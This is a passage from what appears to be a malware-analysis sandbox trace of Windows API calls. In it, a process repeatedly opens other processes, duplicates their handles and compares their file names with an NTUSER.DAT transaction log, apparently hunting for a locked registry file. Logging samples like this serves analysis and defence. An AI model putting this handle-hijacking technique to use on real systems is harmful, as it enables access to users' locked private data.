CloseHandle (hObject=0x194) returned 1 [0163.152] CloseHandle (hObject=0x1e8) returned 1 [0163.152] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0163.152] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.152] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.153] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.154] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.154] CloseHandle (hObject=0x1e4) returned 1 [0163.154] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0163.154] CloseHandle (hObject=0x194) returned 1 [0163.154] CloseHandle (hObject=0x1e8) returned 1 [0163.154] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0163.154] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x238, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.154] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.155] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.161] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.161] CloseHandle (hObject=0x1e4) returned 1 [0163.161] _wcsicmp (_Str1="\\msutb.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.161] CloseHandle (hObject=0x194) returned 1 [0163.161] CloseHandle (hObject=0x1e8) returned 1 [0163.161] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x588) returned 0x1e8 [0163.161] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.161] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.162] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.163] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.163] CloseHandle (hObject=0x1e4) returned 1 [0163.163] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.163] CloseHandle (hObject=0x194) returned 1 [0163.163] CloseHandle (hObject=0x1e8) returned 1 [0163.163] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x588) returned 0x1e8 [0163.163] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x68, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.163] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.164] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.168] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.169] CloseHandle (hObject=0x1e4) returned 1 [0163.169] CloseHandle (hObject=0x194) returned 1 [0163.169] CloseHandle (hObject=0x1e8) returned 1 [0163.169] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x360) returned 0x1e8 [0163.169] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.169] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.170] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.173] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.173] CloseHandle (hObject=0x1e4) returned 1 [0163.173] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.173] CloseHandle (hObject=0x194) returned 1 [0163.173] CloseHandle (hObject=0x1e8) returned 1 [0163.173] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x360) returned 0x1e8 [0163.173] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.173] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.174] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.175] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.175] CloseHandle (hObject=0x1e4) returned 1 [0163.175] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0163.175] CloseHandle (hObject=0x194) returned 1 [0163.175] CloseHandle (hObject=0x1e8) returned 1 [0163.175] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6f4) returned 0x1e8 [0163.175] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.175] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.176] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.177] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.177] CloseHandle (hObject=0x1e4) returned 1 [0163.177] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.177] CloseHandle (hObject=0x194) returned 1 [0163.177] CloseHandle (hObject=0x1e8) returned 1 [0163.177] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6f4) returned 0x1e8 [0163.178] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.178] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.178] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.179] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.179] CloseHandle (hObject=0x1e4) returned 1 [0163.179] _wcsicmp (_Str1="\\Microsoft Visual Studio 8", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.179] CloseHandle (hObject=0x194) returned 1 [0163.180] CloseHandle (hObject=0x1e8) returned 1 [0163.180] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1e8 [0163.180] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.180] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.186] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.190] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.190] CloseHandle (hObject=0x1e4) returned 1 [0163.190] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.190] CloseHandle (hObject=0x194) returned 1 [0163.190] CloseHandle (hObject=0x1e8) returned 1 [0163.190] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1e8 [0163.190] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.190] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.198] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.198] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.199] CloseHandle (hObject=0x1e4) returned 1 [0163.199] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0163.199] CloseHandle (hObject=0x194) returned 1 [0163.199] CloseHandle (hObject=0x1e8) returned 1 [0163.199] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc0) returned 0x1e8 [0163.199] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.199] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.200] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.204] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.204] CloseHandle (hObject=0x1e4) returned 1 [0163.204] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.204] CloseHandle (hObject=0x194) returned 1 [0163.204] CloseHandle (hObject=0x1e8) returned 1 [0163.204] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc0) returned 0x1e8 [0163.204] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.204] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.205] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.209] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.209] CloseHandle (hObject=0x1e4) returned 1 [0163.209] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.209] CloseHandle (hObject=0x194) returned 1 [0163.209] CloseHandle (hObject=0x1e8) returned 1 [0163.209] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x534) returned 0x1e8 [0163.209] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.209] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.210] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.211] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.211] CloseHandle (hObject=0x1e4) returned 1 [0163.211] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.211] CloseHandle (hObject=0x194) returned 1 [0163.211] CloseHandle (hObject=0x1e8) returned 1 [0163.211] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x534) returned 0x1e8 [0163.211] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.211] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.212] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.213] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.213] CloseHandle (hObject=0x1e4) returned 1 [0163.213] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.213] CloseHandle (hObject=0x194) returned 1 [0163.213] CloseHandle (hObject=0x1e8) returned 1 [0163.213] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x70c) returned 0x1e8 [0163.213] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.213] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.214] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.215] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.215] CloseHandle (hObject=0x1e4) returned 1 [0163.215] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.215] CloseHandle (hObject=0x194) returned 1 [0163.215] CloseHandle (hObject=0x1e8) returned 1 [0163.215] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x70c) returned 0x1e8 [0163.215] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.215] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.216] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.217] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.217] CloseHandle (hObject=0x1e4) returned 1 [0163.217] _wcsicmp (_Str1="\\Windows NT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.217] CloseHandle (hObject=0x194) returned 1 [0163.217] CloseHandle (hObject=0x1e8) returned 1 [0163.217] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x290) returned 0x1e8 [0163.217] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.217] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.220] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.221] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.221] CloseHandle (hObject=0x1e4) returned 1 [0163.221] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.221] CloseHandle (hObject=0x194) returned 1 [0163.221] CloseHandle (hObject=0x1e8) returned 1 [0163.221] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x290) returned 0x1e8 [0163.222] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.222] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.223] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.223] CloseHandle (hObject=0x1e4) returned 1 [0163.223] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.223] CloseHandle (hObject=0x194) returned 1 [0163.223] CloseHandle (hObject=0x1e8) returned 1 [0163.223] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7b0) returned 0x1e8 [0163.223] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.223] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.224] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.224] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.225] CloseHandle (hObject=0x1e4) returned 1 [0163.225] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.225] CloseHandle (hObject=0x194) returned 1 [0163.225] CloseHandle (hObject=0x1e8) returned 1 [0163.225] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7b0) returned 0x1e8 [0163.225] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.225] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.229] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.235] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.235] CloseHandle (hObject=0x1e4) returned 1 [0163.235] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.235] CloseHandle (hObject=0x194) returned 1 [0163.236] CloseHandle (hObject=0x1e8) returned 1 [0163.236] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x57c) returned 0x1e8 [0163.236] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.236] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.236] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.241] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.241] CloseHandle (hObject=0x1e4) returned 1 [0163.241] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.241] CloseHandle (hObject=0x194) returned 1 [0163.241] CloseHandle (hObject=0x1e8) returned 1 [0163.242] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x57c) returned 0x1e8 [0163.242] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.242] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.242] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.244] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.244] CloseHandle (hObject=0x1e4) returned 1 [0163.244] _wcsicmp (_Str1="\\Windows Sidebar", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.244] CloseHandle (hObject=0x194) returned 1 [0163.244] CloseHandle (hObject=0x1e8) returned 1 [0163.244] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x780) returned 0x1e8 [0163.244] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.244] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.245] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.246] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.246] CloseHandle (hObject=0x1e4) returned 1 [0163.246] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.246] CloseHandle (hObject=0x194) returned 1 [0163.246] CloseHandle (hObject=0x1e8) returned 1 [0163.246] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x780) returned 0x1e8 [0163.246] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.246] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.247] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.248] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.248] CloseHandle (hObject=0x1e4) returned 1 [0163.248] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0163.248] CloseHandle (hObject=0x194) returned 1 [0163.248] CloseHandle (hObject=0x1e8) returned 1 [0163.248] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x10c) returned 0x1e8 [0163.248] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.248] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.249] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.250] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.250] CloseHandle (hObject=0x1e4) returned 1 [0163.250] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.250] CloseHandle (hObject=0x194) returned 1 [0163.250] CloseHandle (hObject=0x1e8) returned 1 [0163.250] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x10c) returned 0x1e8 [0163.250] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: 